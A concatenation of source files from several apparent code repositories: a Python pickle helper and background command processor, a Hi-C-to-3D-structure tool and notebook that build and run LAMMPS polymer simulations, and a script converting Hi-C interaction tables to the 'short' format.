def pickle_method(method):
'''Pickle a method.'''
method_name = method.im_func.__name__
obj = method.im_self
cls = method.im_class
if method_name.startswith('__') and not method_name.endswith('__'):
# Handle mangled names
cls_name = cls.__name__.lstrip('_')
method_name = '_{0}{1}'.format(cls_name, method_name)
return unpickle_method, (method_name, obj, cls)
def unpickle_method(method_name, obj, cls):
'''Unpickle a method.'''
if obj and method_name in obj.__dict__:
# Handle classmethod
cls, obj = obj, None
for cls in cls.__mro__:
try:
method = cls.__dict__[method_name]
except KeyError:
pass
else:
break
return method.__get__(obj, cls)
# Register instancemethod support
copy_reg.pickle(types.MethodType, pickle_method, unpickle_method)
```
#### File: backend/processor/background.py
```python
import subprocess
import pickle
import base64
try:
from shlex import quote
except ImportError:
from pipes import quote
from .base import Processor
from .. import pickle_support
class BackgroundProcessor(Processor):
'''Local background processor.'''
def process(self, command, args=None, kw=None):
'''Process *command* with *args* and *kw*.'''
if args is None:
args = ()
if kw is None:
kw = {}
serialised = base64.b64encode(
pickle.dumps(
{'command': command, 'args': args, 'kw': kw},
pickle.HIGHEST_PROTOCOL
)
)
python_statement = (
'import pickle;'
'import base64;'
'data = base64.b64decode(\'{0}\');'
'data = pickle.loads(data);'
'data[\'command\'](*data[\'args\'], **data[\'kw\'])'
).format(serialised.replace("'", r"\'"))
command = []
if self.host is None:
command.append('python')
else:
command.extend(self.host.get_python_prefix())
command.extend(['-c', python_statement])
print command
process = subprocess.Popen(command)
return 'Background process started: {0}'.format(process.pid)
``` |
{
"source": "4DGB/3DStructure",
"score": 2
} |
#### File: 3DStructure/hic2structure/__main__.py
```python
import argparse
from pathlib import Path
import sys
from .types import Settings
from .hic import HIC, HICError
from .lammps import LAMMPSError, run_lammps
from .contacts import contact_records_to_set
from .out import write_structure
########################
# GLOBALS
########################
verbose=False
########################
# HELPER FUNCTIONS
########################
def settings_from_args(args: argparse.Namespace) -> Settings:
return {
'chromosome': args.chromosome,
'resolution': args.resolution,
'count_threshold': args.count,
'distance_threshold': 0, # Unused in the main script
'bond_coeff': args.bond_coeff,
'timesteps': args.timesteps
}
def log_info(message):
'''
Log a message to stderr (if verbose is True)
'''
if not verbose:
return
print(
f"\033[1m[\033[94m>\033[0m\033[1m]:\033[0m {message}",
file=sys.stderr, flush=True
)
def log_error(message):
'''
Log an error message to stderr
'''
prefix = "\033[1m[\033[31mERROR\033[0m\033[1m]:\033[0m" \
if verbose else "error:"
print(f"{prefix} {message}")
########################
# PARSE ARGUMENTS
########################
parser = argparse.ArgumentParser(
prog="python3 -m hic2structure",
description="hic2structure: Uses LAMMPS to generate structures from Hi-C data."
)
parser.add_argument(
"--resolution",
type=int, default=200000, metavar="NUM", dest="resolution",
help="Bin resolution. (Defaults to 200000)"
)
parser.add_argument(
"--count-threshold",
type=float, default=2.0, metavar="NUM", dest="count",
help="Threshold for reading contacts from Hi-C file. "\
"Records with a count lower than this are exluced. (Defaults to 2.0)"
)
parser.add_argument(
"-o", "--output",
type=str, default="./out", metavar="PATH", dest="output",
help="Output directory. (Defaults to './out')"
)
parser.add_argument(
"--lammps",
type=str, default="lmp", metavar="NAME", dest="lammps",
help="Name of LAMMPS executable to use. (Defaults to 'lmp')"
)
parser.add_argument(
"--chromosome",
type=str, default="X", metavar="NAME", dest="chromosome",
help="Chromosome to use. (Defaults to 'X')"
)
parser.add_argument(
"--bond-coeff",
type=int, default=55, metavar="NUM", dest="bond_coeff",
help="FENE bond coefficient. This affects the maximum allowed length of"\
" bonds in the LAMMPS simulation. If LAMMPS gives errors about bad"\
" bad FENE bonds, try increasing this value. (Defaults to 55)"
)
parser.add_argument(
"--timesteps",
type=int, default=1000000, metavar="NUM", dest="timesteps",
help="Number of timesteps to run in LAMMPS"
)
parser.add_argument(
"-v", "--verbose",
help="Enable verbose output",
action="store_true", default=False
)
parser.add_argument(
"file",
help="Input .hic file", type=str
)
args = parser.parse_args()
verbose = args.verbose
outdir = Path(args.output)
settings = settings_from_args(args)
########################
# MAIN
########################
try:
hic = HIC( Path(args.file) )
inputs = contact_records_to_set( hic.get_contact_records(settings) )
log_info(f"Loaded \033[1m{len(inputs)}\033[0m contact records from Hi-C file.")
except HICError as e:
log_error(f"Error reading contact records: {e}")
exit(1)
outdir.mkdir(parents=True, exist_ok=True)
try:
log_info(f"Running LAMMPS (this might take a while)...")
lammps_data = run_lammps(inputs, settings, args.lammps, copy_log_to=outdir/'sim.log')
log_info(f"LAMMPS finished.")
except LAMMPSError as e:
log_error(e)
exit(1)
last_timestep = lammps_data[ sorted(lammps_data.keys())[-1] ]
structure_path = outdir/'structure.csv'
write_structure( structure_path, last_timestep )
log_info(f"Saved structure data to \033[1m{structure_path}\033[0m.")
```
#### File: 3DStructure/original_notebook/hicstraw.py
```python
import numpy as np
import plotly.graph_objs as go
from plotly.offline import iplot
"""
Straw module
Straw enables programmatic access to .hic files.
.hic files store the contact matrices from Hi-C experiments and the
normalization and expected vectors, along with meta-data in the header.
Usage: strawObj = straw <hicFile(s)>
matrixObj = strawObj.getNormalizedMatrix <chr1> <chr2> <NONE/VC/VC_SQRT/KR> <BP/FRAG> <binsize>
data = matrixObj.getDataFromBinRegion <x1,x2,y1,y2>
Example:
import straw
strawObj = straw(filename)
matrixObj = strawObj.getNormalizedMatrix('5', '5', 'KR', 'BP', 5000)
result = matrixObj.getDataFromBinRegion(0,500,0,500)
for i in range(len(result[0])):
... print("{0}\t{1}\t{2}".format(result[0][i], result[1][i], result[2][i]))
See https://github.com/theaidenlab/straw/wiki/Python for more documentation
"""
from __future__ import absolute_import, division, print_function, unicode_literals
__author__ = "<NAME>, <NAME>, <NAME>, <NAME>, <NAME>"
__license__ = "MIT"
import struct
import zlib
import requests
import io
import concurrent.futures
import math
def __readcstr(f):
""" Helper function for reading in C-style string from file
"""
buf = b""
while True:
b = f.read(1)
if b is None or b == b"\0":
return buf.decode("utf-8")
elif b == "":
raise EOFError("Buffer unexpectedly empty while trying to read null-terminated string")
else:
buf += b
"""
functions for chrom.sizes
internal representation is a dictionary with
chromosome name as the key
value maps to a tuple containing the index and chromosome length
"""
class ChromDotSizes:
def __init__(self, data):
self.data = data
def getLength(self, chrom):
try:
return int(self.data[chrom][1])
except:
raise ValueError(str(chrom) + " not in chrom.sizes. Check that the chromosome name matches the genome.\n")
def getIndex(self, chrom):
try:
return int(self.data[chrom][0])
except:
raise ValueError(str(chrom) + " not in chrom.sizes. Check that the chromosome name matches the genome.\n")
def figureOutEndpoints(self, chrAndPositions):
chrAndPositionsArray = chrAndPositions.split(":")
chrom = chrAndPositionsArray[0]
indx1 = 0
indx2 = self.getLength(chrom)
if len(chrAndPositionsArray) == 3:
indx1 = int(chrAndPositionsArray[1])
indx2 = int(chrAndPositionsArray[2])
return chrom, indx1, indx2
def read_metadata(infile,verbose=False):
"""
Reads the metadata of HiC file from header.
Args
infile: str, path to the HiC file
verbose: bool
Returns
metadata: dict, containing the metadata.
Keys of the metadata:
HiC version,
Master index,
Genome ID (str),
Attribute dictionary (dict),
Chromosomes (dict),
Base pair-delimited resolutions (list),
Fragment-delimited resolutions (list).
"""
metadata={}
import io
import struct
if (infile.startswith("http")):
# try URL first. 100K should be sufficient for header
headers={'range' : 'bytes=0-100000', 'x-amz-meta-requester' : 'straw'}
s = requests.Session()
r=s.get(infile, headers=headers)
if (r.status_code >=400):
print("Error accessing " + infile)
print("HTTP status code " + str(r.status_code))
sys.exit(1)
req=io.BytesIO(r.content)
myrange=r.headers['content-range'].split('/')
totalbytes=myrange[1]
else:
req=open(infile, 'rb')
magic_string = struct.unpack('<3s', req.read(3))[0]
req.read(1)
if (magic_string != b"HIC"):
sys.exit('This does not appear to be a HiC file magic string is incorrect')
version = struct.unpack('<i',req.read(4))[0]
metadata['HiC version']=version
masterindex = struct.unpack('<q',req.read(8))[0]
metadata['Master index']=masterindex
genome = ""
c=req.read(1).decode("utf-8")
while (c != '\0'):
genome += c
c=req.read(1).decode("utf-8")
metadata['Genome ID']=genome
if (version > 8):
nvi = struct.unpack('<q',req.read(8))[0]
nvisize = struct.unpack('<q',req.read(8))[0]
metadata['NVI'] = nvi
metadata['NVI size'] = nvisize
## read and throw away attribute dictionary (stats+graphs)
nattributes = struct.unpack('<i',req.read(4))[0]
d={}
for x in range(0, nattributes):
key = __readcstr(req)
value = __readcstr(req)
d[key]=value
metadata['Attribute dictionary']=d
nChrs = struct.unpack('<i',req.read(4))[0]
d={}
for x in range(0, nChrs):
key = __readcstr(req)
if (version > 8):
value = struct.unpack('q',req.read(8))[0]
else:
value = struct.unpack('<i',req.read(4))[0]
d[key]=value
metadata["Chromosomes"]=d
nBpRes = struct.unpack('<i',req.read(4))[0]
l=[]
for x in range(0, nBpRes):
res = struct.unpack('<i',req.read(4))[0]
l.append(res)
metadata["Base pair-delimited resolutions"]=l
nFrag = struct.unpack('<i',req.read(4))[0]
l=[]
for x in range(0, nFrag):
res = struct.unpack('<i',req.read(4))[0]
l.append(res)
metadata["Fragment-delimited resolutions"]=l
for k in metadata:
if k!='Attribute dictionary':
print(k,':',metadata[k])
if verbose:
print('Attribute dictionary',':',metadata['Attribute dictionary'])
return metadata
# Downloads Hi-C file
#!wget -cq https://www.dropbox.com/s/t3d3kmoerm54dlr/GSM1551620_HIC071.hic
# Define files and HiC read settings
path = '/content/'
hicname = 'GSM1551620_HIC071.hic'
hic_metadata = read_metadata(hicname)
chromosomes = list(hic_metadata["Chromosomes"].keys())
base_resolutions = hic_metadata["Base pair-delimited resolutions"]
fragment_resolutions = hic_metadata["Fragment-delimited resolutions"]
"""# 2. Hi-C Data Processing"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# !pip install hic-straw
# import straw
# Saves all self-contact data in Hi-C file
def self_chromosome_interactions(chromosomes, hicname, res):
genome = {}
for i in chromosomes:
# Adds chromosome interaction to genome dictionary,
# interactions stored as list of contactRecord objects
try:
genome[i] = straw.straw('observed','KR', hicname, i, i, 'BP', res)
except:
print(f"Interaction data for chromosome {i} not found")
return genome
# Converts chromosome interactions from contactRecords into a list
def contactRecords_to_list(records):
table = np.zeros((len(records), 3))
index = 0
for contact in records:
table[index][0] = int(contact.binX)
table[index][1] = int(contact.binY)
table[index][2] = contact.counts
index += 1
return table
# Converts data in resolution units into particle numbers
def res_correct(table, res):
table[:, 0] //= res
table[:, 1] //= res
table[:, 0] += 1
table[:, 1] += 1
return table
# Keeps entries where contact counts are higher than user-given threshold
# and gets rid of atom self contacts
def lammps_correct(table, threshold):
table = table[table[:,2] > threshold]
table = table[table[:,0] != table[:,1]]
return table
res = 250000
threshold = 3.3
#genome = self_chromosome_interactions(chromosomes, hicname, res)
genome = {}
for i in chromosomes:
# Adds chromosome interaction to genome dictionary,
# interactions stored as list of contactRecord objects
try:
genome[i] = straw.straw('observed','KR', hicname, i, i, 'BP', res)
except:
print(f"Interaction data for chromosome {i} not found")
x_correct = lammps_correct(res_correct(contactRecords_to_list(genome["X"]), res), threshold)
"""# 3. LAMMPS Input & Data File Construction"""
import time
# function to plot 3D structure
def plot_3D(coords):
x = np.zeros(len(coords))
y = np.zeros(len(coords))
z = np.zeros(len(coords))
for i in range(len(coords)):
x[i] = coords[i][0]
y[i] = coords[i][1]
z[i] = coords[i][2]
trace = go.Scatter3d(
x = x, y = y, z = z, mode = 'lines+markers', marker = dict(
size = 5,
colorscale = 'Viridis'
)
)
layout = go.Layout(title = f'Initial Random Structure')
fig = go.Figure(data = [trace], layout = layout)
iplot(fig)
return None
# function to check if next site is already occupied
def check_if_free(lattice_coords, next_coords, index):
for i in range(index):
if lattice_coords[i][0] == next_coords[0] and lattice_coords[i][1] == next_coords[1] \
and lattice_coords[i][2] == next_coords[2]:
return False
return True
# function to create random 3D walk on lattice
def random_walk(n):
backtrack = 10
lattice_coords = np.zeros([n, 3])
steps = np.array([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0],
[-1.0, 0.0, 0.0], [0.0, -1.0, 0.0], [0.0, 0.0, -1.0]])
i = 1
while i < n:
issue = False
s = time.time()
#if i % 100 == 0:
#print(i, s-start, 's')
rand = np.random.randint(0, 6)
next_coords = lattice_coords[i - 1] + steps[rand]
while check_if_free(lattice_coords, next_coords, i) == False:
rand = np.random.randint(0, 6)
next_coords = lattice_coords[i-1] + steps[rand]
e = time.time()
if e - s > 0.1:
issue = True
#print('Stuck! Go back and find a new way... %s' % i)
for k in range(1, backtrack + 1):
lattice_coords[i-k] = np.zeros(3)
i -= backtrack + 1
break
if issue == False:
lattice_coords[i] = next_coords
i += 1
return lattice_coords
# function to create molecule tags
def create_molecule_tags(n, lengths):
tags = []
tag = 1
cumlength = np.cumsum(lengths)
for i in range(1, n+1):
if i - 1 in cumlength:
tag += 1
tags.append(tag)
return tags
# function to create bonds
def create_bonds(n, lengths):
bonds = []
cumlength = np.cumsum(lengths)
for i in range(1, n):
if i not in cumlength:
bonds.append([i, i+1])
return bonds
# function to create angles
def create_angles(n, lengths):
angles = []
cumlength = np.cumsum(lengths)
for i in range(1, n-1):
if (i not in cumlength) and (i+1 not in cumlength):
angles.append([i, i + 1, i + 2])
return angles
# function to create data file
def create_datafile(n, lengths, spacing, lattice_numbers, dimensions):
chains = int(len(lengths)) # number of chains
bond_number = int(sum(lengths) - chains) # number of bonds
angle_number = 0
for length in lengths:
if length > 2.0:
angle_number += int(length - 2) # number of bond angles
lattice_coords = random_walk(n) * spacing # coordinates of lattice points
tags = create_molecule_tags(n, lengths) # molecule tags
bonds = create_bonds(n, lengths) # indicates bonds between particles
angles = create_angles(n, lengths) # indicates angles between particles
# open datafile to write to
datafile = open(f'random_coil_N{n}.dat', 'w')
datafile.write(f'LAMMPS data file for random 3D walk on lattice: N = {n}, Chain length = {length}\n\n')
datafile.write(f'{n} atoms\n1 atom types\n{bond_number} bonds\n2 bond types\n1000 extra bond per atom\n{angle_number} angles\n1 angle types\n\n')
datafile.write(f'{-dimensions[0] / 2} {dimensions[0] / 2} xlo xhi\n{-dimensions[1] / 2} {dimensions[1] / 2} ylo yhi\n{-dimensions[2] / 2} {dimensions[2] / 2} zlo zhi\n\n')
datafile.write('Masses\n\n1 1\n\nAtoms\n')
for i in range(n):
datafile.write(f'\n{i + 1}\t{tags[i]}\t1\t{lattice_coords[i][0]}\t{lattice_coords[i][1]}\t{lattice_coords[i][2]}\t0\t0\t0')
if bond_number > 0:
datafile.write('\n\nBonds\n')
for i in range(len(bonds)):
datafile.write(f'\n{i + 1}\t1\t{bonds[i][0]}\t{bonds[i][1]}')
if angle_number > 0:
datafile.write('\n\nAngles\n')
for i in range(len(angles)):
datafile.write(f'\n{i + 1}\t1\t{angles[i][0]}\t{angles[i][1]}\t{angles[i][2]}')
datafile.close()
plot_3D(lattice_coords)
return None
# function to create input file
def create_inputfile(n, timesteps, bondconnect):
# opens input file to write to
datafile = open('in.input', 'w')
dataname = f'random_coil_N{n}.dat' # data file name
lang = np.random.randint(1,1000000) # generates noise term for langevin
datafile.write('log sim.log\nunits lj\n\n')
datafile.write('atom_style angle\nboundary p p p\n\n')
datafile.write('neighbor 4 bin\nneigh_modify every 1 delay 1 check yes\n\n')
datafile.write('atom_modify sort 0 0\n\n')
datafile.write(f'#restart 1000000 N{n}.restart\n\n')
datafile.write(f'read_data {dataname}\n')
datafile.write('reset_timestep 0\n\n')
datafile.write(f'write_data equilibrated_N{n}.dat\n\n')
datafile.write('group all type 1\n\n')
datafile.write('dump 1 all custom 1000 sim.dump id x y z ix iy iz\n')
datafile.write('dump_modify 1 format line "%d %.5f %.5f %.5f %d %d %d"\n\n')
datafile.write('angle_style cosine\nangle_coeff 1 0.0\n\n')
datafile.write('pair_style lj/cut 1.12246152962189\n')
datafile.write('pair_modify shift yes\n')
datafile.write('pair_coeff * * 1.0 1.0\n\n')
datafile.write('bond_style hybrid harmonic fene\n')
datafile.write('bond_coeff 1 fene 30.0 10 1.0 1.0\n')
datafile.write('bond_coeff 2 harmonic 1.0 2.2\n')
datafile.write('special_bonds fene\n\n')
datafile.write('fix 1 all nve\n')
datafile.write(f'fix 2 all langevin 1.0 1.0 1.0 {lang}\n\n')
datafile.write('thermo 50000\n\n')
for i in range(len(bondconnect)):
datafile.write(f'create_bonds single/bond 2 {int(bondconnect[i][0])} {int(bondconnect[i][1])} special yes\n')
datafile.write('thermo_style custom step temp etotal epair emol press pxx pyy pzz lx ly lz pe ke ebond evdwl\n\n')
datafile.write('timestep 0.00001\n')
datafile.write(f'run {timesteps}')
# Defining LAMMPS properties
n = int(max(x_correct.max(axis = 0)[0], x_correct.max(axis = 0)[1])) # total number of particles
lengths = [n] # length of chains
spacing = 3.0 # lattice spacing
lattice_numbers = np.array([200, 200, 200])
dimensions = lattice_numbers * 2 # dimensions of box
timesteps = 1000000
# Creating input and data files for simulation
start = time.time()
create_datafile(n, lengths, spacing, lattice_numbers, dimensions)
create_inputfile(n, timesteps, x_correct)
end = time.time()
"""# 4. LAMMPS Simulation"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# # Creates LAMMPS executable
# !wget https://github.com/lmhale99/atomman-demo/raw/main/lmp.gz
# !gunzip lmp.gz
# !chmod 755 lmp
#
# import subprocess
# import shlex
# Runs LAMMPS simulation based on input file
def run_lammps(infile):
command = shlex.split(f'./lmp -in {infile}')
subprocess.run(command, check=True, capture_output=False, text=True)
# Reads dump file and extracts coordinate data
def readdump(file):
f = open(file).read().splitlines()
dump = {}
#finds coordinates using "ITEM:"
#creates a dictionary with timestep and coordinates
i = 0
while i < len(f):
timestep = int(f[f.index("ITEM: TIMESTEP", i) + 1].strip())
begind = f.index("ITEM: ATOMS id x y z ix iy iz", i)
try:
endind = f.index("ITEM: TIMESTEP", i+1)
except ValueError:
endind = len(f)
coords = f[begind + 1:endind]
data = np.zeros((len(coords), 7))
index = 0
for j in coords:
line = j.split()
data[index][0] = int(line[0])
data[index][1] = float(line[1])
data[index][2] = float(line[2])
data[index][3] = float(line[3])
data[index][4] = float(line[4])
data[index][5] = float(line[5])
data[index][6] = float(line[6])
index += 1
dump[timestep] = data
i = endind
return dump
# Displays simulation at timestep
def dumpplot(dump, timestep):
trace = go.Scatter3d(
x = dump[timestep][:,1], y = dump[timestep][:,2], z = dump[timestep][:,3], mode = 'lines+markers', marker = dict(
size = 5,
color = dump[timestep][:,0],
colorscale = 'Viridis'
)
)
layout = go.Layout(title = f'Simulation at timestep {timestep}')
fig = go.Figure(data = [trace], layout = layout)
iplot(fig)
run_lammps("in.input")
dump = readdump("sim.dump")
dumpplot(dump, 100000)
"""# 5. Analysis"""
#!wget -cq https://www.dropbox.com/s/nkbuklgq2c9ewvw/nWTXa
from scipy.stats import pearsonr
from scipy.spatial.distance import pdist, squareform
#Finds all contacts
def find_contacts(data, timestep, dist):
coords = data[timestep][:,1:4]
IDs = data[timestep][:,0]
distances = np.triu(squareform(pdist(coords)))
contact_IDarrays = np.where((distances<dist) & (distances>0))
C = np.ma.size(contact_IDarrays[0])
contact_IDs = np.hstack((np.reshape(np.take(IDs,contact_IDarrays[0]), (C,1)), np.reshape(np.take(IDs,contact_IDarrays[1]), (C,1))))
contacts = np.hstack((np.reshape(contact_IDs[:,0], (C,1)), np.reshape(contact_IDs[:,1], (C,1)), distances[np.reshape(contact_IDarrays[0], (C,1)), np.reshape(contact_IDarrays[1], (C,1))]))
return contacts
def find_nwtxa_contacts(file, dist):
rawdata = open(file).read().splitlines()
table = np.zeros((len(rawdata), 3))
index = 0
for i in rawdata:
line = i.split()
if(float(line[0]) > float(line[1]) and line[2] != 'NA' and float(line[2]) > dist):
table[index][0] = int(line[0])
table[index][1] = int(line[1])
table[index][2] = float(line[2])
index += 1
return table[0:index]
def plotcontactmap(contacts):
fig = go.Figure(data=[go.Scatter(
x = contacts[:,0],
y = contacts[:,1],
mode = 'markers',
marker=dict(
opacity=0.9,
color='Black',
size=1,
))
])
fig.update_layout(
width = 600,
height = 600,
title = "Contact Map"
)
fig.update_yaxes(
scaleanchor = "x",
scaleratio = 1,
)
fig.show()
def combine(mapone, maptwo):
onemax = int(max(mapone.max(axis = 0)[0], mapone.max(axis = 0)[1]))
twomax = int(max(maptwo.max(axis = 0)[0], maptwo.max(axis = 0)[1]))
maptwo[:, 0] *= onemax/twomax
maptwo[:, 1] *= onemax/twomax
combined = np.vstack((mapone, maptwo))
return combined
contacts = find_contacts(dump, 100000, 3.3)
nwtxa = find_nwtxa_contacts("nWTXa", 5)
combined = combine(nwtxa, contacts)
plotcontactmap(combined)
``` |
{
"source": "4DGB/hic-converter",
"score": 3
} |
#### File: hic-converter/scripts/h5.to.short.py
```python
import sys
# In[ ]:
## Set user defined variables
## Check we have three inputs!
assert (len(sys.argv) >= 4), "ERROR: This script must include:\n(1) The full path to a ginteractions (tsv) file (which is assumed to be an h5 matrix converted via HicExplorer).\n(2) A genome size (tsv) file with chromosome and size columns.\n(3) A valid output path to save the hic short file."
## Gather data inputs
datapath = str(sys.argv[1])
sizepath = str(sys.argv[2])
savepath = str(sys.argv[3])
## Set verbosity if passed
if (len(sys.argv) == 5):
if str(sys.argv[4]) == 'true':
verbose = True
else:
verbose = False
else:
verbose = False
# ## Set user defined variables
# ## Set input path
# datapath = '/Users/croth/HIC/MRC5/2401.006.h5.toremove.ginteractions.tsv'
#
# ## Set output path
# savepath = '/Users/croth/HIC/MRC5/2401.006.h5.toremove.short'
#
# ## Set path to size file
# sizepath = '/Users/croth/REFERENCES/ENCODE/genome.size.txt'
# #sizepath = '/Users/croth/REFERENCES/ENCODE/test1.size.txt'
# #sizepath = '/Users/croth/REFERENCES/ENCODE/test2.size.txt'
#
# ## Set verbose
# verbose = False
# In[ ]:
## Set other needed variables
## Set verbosity
#verbose = True
## Set input sep
mysep = '\t'
## Set output output sep
outsep = ' '
## Set column names
colname = ['Chrom1','Left1','Right1','Chrom2','Left2','Right2','Quality']
# In[ ]:
## Bring in needed mods
import pandas as pd, numpy as np
## Write a ftn to check index between two dataframes
def checkix(x,y):
x = np.array(sorted(x.index.values))
y = np.array(sorted(y.index.values))
assert (np.sum(x-y) == 0), "ERROR: The indices of the dataframes to not match!"
# In[ ]:
## Load in genomesize and contact data
## Log if verbose
if verbose:
print("Loading genome size and contact (h5) files.")
## Load genome size file
genomesize = pd.read_csv(sizepath,sep=mysep,names=['Chrom','Size'])
## Make a list of chromosomes
chrlist = genomesize.Chrom.tolist()
# In[ ]:
## Load in and set columns
temp = pd.read_csv(datapath,sep=mysep,header=None,names=colname)
## Take total contact counts
contacts = temp.shape[0]
## Print size of temp file
if verbose:
print('Detected %s HiC contacts.'%contacts)
if (contacts == 0):
print('ERROR: No HiC contacts detected!')
sys.exit(1)
# In[ ]:
## Subset data for data in genomesizes file
temp = temp[(temp[colname[0]].isin(chrlist)) &
(temp[colname[3]].isin(chrlist))].reset_index(drop=True)
## Gather the new index after dropping samples
theindex = temp.index.values
## Number of contacts dropped
ndrop = contacts - temp.shape[0]
## calculate total number of conatacts dropped
nperc = np.round(100*ndrop/contacts,3)
## Print the number of dropped contacts
if verbose:
print("WARNING: Removed %s ( %s"%(ndrop,nperc) + " % ) contacts from unlisted chromosomes." )
# In[ ]:
## Check that we have contacts for all chromosomes in chrlist
## Gather chromosomes still in the filtered h5
tempchrlist = list(np.unique(np.concatenate([temp[colname[0]].unique(),temp[colname[3]].unique()])))
## Gather the names of the missing chromosomes
missing = [c for c in chrlist if c not in tempchrlist]
## If any chromosomes are missing
if len(missing) > 0:
print("WARNING: No contacts were detected for chromosomes:")
print("\n".join(missing))
# In[ ]:
## Split by contact type
## Log if verbose
if verbose:
print("Splitting inter- & intra-chromosomal contacts.")
## Gather the between chrom contacts
inter = temp[(temp.Chrom1!=temp.Chrom2)]
## Check the shape and number of inter-chromosome contacts
if verbose and (inter.shape[0] == 0):
print("WARNING: Zero inter-chromosomal contacts detected.")
else:
print("Number of between chromosome contacts: %s"%inter.shape[0])
## Gather the within chromosome contacts
intra = temp[(temp.Chrom1==temp.Chrom2)]
## Check the shape and number of intra-chromosome contacts
if verbose and (intra.shape[0] == 0):
print("ERROR: Zero intra-chromosomal contacts detected.")
sys.exit(1)
else:
print("Number of within chromosome contacts: %s"%intra.shape[0])
## What is the ratio of intra vs inter
if verbose and (intra.shape[0] > 0):
## Calculate ratio
interintra = np.round(100*inter.shape[0]/intra.shape[0],3)
## Print to screen
print('Ratio of inter- to intra-chromosome contacts: %s %s'%(interintra,'%'))
# In[ ]:
## Correct intra chromosomal contacts
## Remove temp
del temp
## Log if verbose
if verbose:
print("Sorting intra-chromosomal contacts.")
## Sort the within chromcontacts by chromosome and left read postition
intrac = pd.concat([intra[(intra.Chrom1==c)].sort_values('Left1') for c in chrlist])
## Delete the old intra
del intra
# In[ ]:
## Split inter chromosome contacts into left and right pairs
## Log status
if verbose and (inter.shape[0]>0):
print("Gathering pairs of inter-chromosomal contacts.")
## Gather left
left = inter[inter.columns[:3]]
## Check work
assert (left.shape[1] == 3), "ERROR: Missing columns of left pairs.\nThere should be three and there are %s"%left.shape[1]
## Gather right
righ = inter[inter.columns[3:-1]]
## Check work
assert (righ.shape[1] == 3), "ERROR: Missing columns of right pairs.\nThere should be three and there are %s"%righ.shape[1]
## Take the correction index
tocorrect = inter.index.values
## Take the quality of between chromosome contacts
interquality = inter[colname[-1]]
# In[ ]:
## Reorder pairs of inter chromosomal contacts
if verbose and (inter.shape[0]>0):
print("Reordering inter-chromosomal contacts by chromosome.")
## Initilize inter list
inter = []
## Iteratively correct the inter chromosome names
for i in tocorrect:
## Gather chromosome names from
## The left pair and ..
c1 = left.loc[i,colname[0]]
## the right pair of the inter chromosome contact
c2 = righ.loc[i,colname[3]]
## Gather chromosome index of the left read and ..
c1ix = genomesize[(genomesize.Chrom==c1)].index.min()
## the right read of the pair in contact
c2ix = genomesize[(genomesize.Chrom==c2)].index.min()
## If the "Left" chromosome is the first in order make in this order
if (c1ix < c2ix):
newline = left.loc[i].tolist() + righ.loc[i].tolist()
## Else if "right" chromosome is the first in order make in this order
else:
newline = righ.loc[i].tolist() + left.loc[i].tolist()
## assert that the chromosomes may not have the same index
assert (c1ix != c2ix), "ERROR: The chromosomes are not inter-chromosomal contacts! "
## append to inter list
inter.append(newline)
## Make list into dataframe
inter = pd.DataFrame(inter,columns=colname[:-1],index=tocorrect)
## Check that we have the same size dataframe
assert (inter.shape[0] == left.shape[0])
# In[ ]:
## Sort inter pairs by chromosome positon
if verbose and (inter.shape[0]>0):
print("Sorting inter-chromosomal contacts by chromosome.")
## Initilize corrected inter (between) chrom contact list
interc = []
## Gather list of chromosomes with trans contacts
interchrs = [c for c in chrlist if c in inter[colname[0]].tolist()]
for c in interchrs:
## Slice the single chromosome
temp = inter[(inter.Chrom1==c)]
## Gather the inter chromosomes
interchrom = genomesize[(genomesize.Chrom.isin(temp[colname[3]].unique()))].Chrom.tolist()
## Sort the right side of the interchromosomes
tempc = pd.concat([temp[(temp[colname[3]]==ic)].sort_values([colname[1],colname[4]]) for ic in interchrom])
## append to the corrected between chromosome contact list
interc.append(tempc)
## concatonate into a dataframe
if (len(interc)>0):
interc = pd.concat(interc)
## Check our work
assert (inter.shape[0] == interc.shape[0])
## Check the index
checkix(inter,interc)
## Delete memory hogs
del tempc
else:
## Set interc to the empty dataframe made above
interc = inter
## Check work
assert (interc.shape[0] == 0)
# In[ ]:
## Combine both sorted inter and intra by sorted chromosome in chrlist
if verbose:
print("Blocking contacts of %s chromosome(s)."%len(chrlist))
## Initilize list
hic = []
## Set counter
ci = 0
## Iterate thru each chromosome
for c in chrlist:
## Slice intra (within)
temp1 = intrac[(intrac[colname[0]]==c)]
## Slice inter (between)
temp2 = interc[(interc[colname[0]]==c)]
## Print a warning if both intra and inter chrom contacts are zero!
if (temp1.shape[0]==0) and (temp2.shape[0]==0):
print('WARNING: No contacts found for %s'%c)
continue
## If there are no between chrom contacts
if (temp2.shape[0]==0):
## Set new temp to just the within chrom contacts
temp = temp1
## Other wise concatinate them
else:
temp = pd.concat([temp1,temp2])
## append to list
hic.append(temp)
## Count
ci += 1
## Check our count
assert ci == len(chrlist)
## make into a dataframe
hic = pd.concat(hic)
## Check the final shape
assert (hic.shape[0] == len(theindex)), "ERROR: There are missing valid HIC contacts!"
## Check inter chrom contacts last column
checkix(hic[(hic[colname[-1]].isna())],interquality)
## Reassign last column to inter chrom contacts
hic.loc[interquality.index,colname[-1]] = interquality.values
## check our assignment
assert (hic.dropna().shape[0] == hic.shape[0]), "ERROR: There is missing data in the HIC dataframe!"
## Check final index
checkix(hic,pd.DataFrame(index=theindex))
# In[ ]:
## Generate a short file
if verbose:
print("Generating hic short file: %s"%savepath)
## gather colunm names to be held over
convertix = np.array([0,1,3,4,6])
## Make new column names
newcols = ['buffer1'] + hic.columns[:2].tolist() + ['buffer2','buffer3'] + hic.columns[3:5].tolist() + ['buffer4'] + hic.columns[-1:].tolist()
## Check that their are nine of these
assert len(newcols) == 9, "ERROR: The short file columns were not generated correctly."
## Initilize short dataframe
short = pd.DataFrame(columns=newcols,index=hic.index)
## For each old column name
for c in colname:
## If its in the new short dataframe assigne it
if c in newcols:
short[c] = hic[c]
else:
pass
## Assign zeros to buffer columns 1,2, and 3
short[['buffer1','buffer2','buffer3']] = 0
## and a one to buffer column 4
short[['buffer4']] = 1
## Convert all the columns except those with the chromosome name to integers
## Gather columns to be converted
toint = [c for c in short.columns if c not in [colname[0],colname[3]]]
## Convert to integers
for c in toint:
short[c] = short[c].apply(int)
## Check that we didn't lose any records
checkix(short,hic)
## SAve out dataframe
short.to_csv(savepath,sep=outsep,header=False,index=False)
## Print finish
if verbose:
print("Finished :D")
``` |
{
"source": "4dityarao/E-Police",
"score": 3
} |
#### File: E-Police/flaskblog/models.py
```python
from datetime import datetime
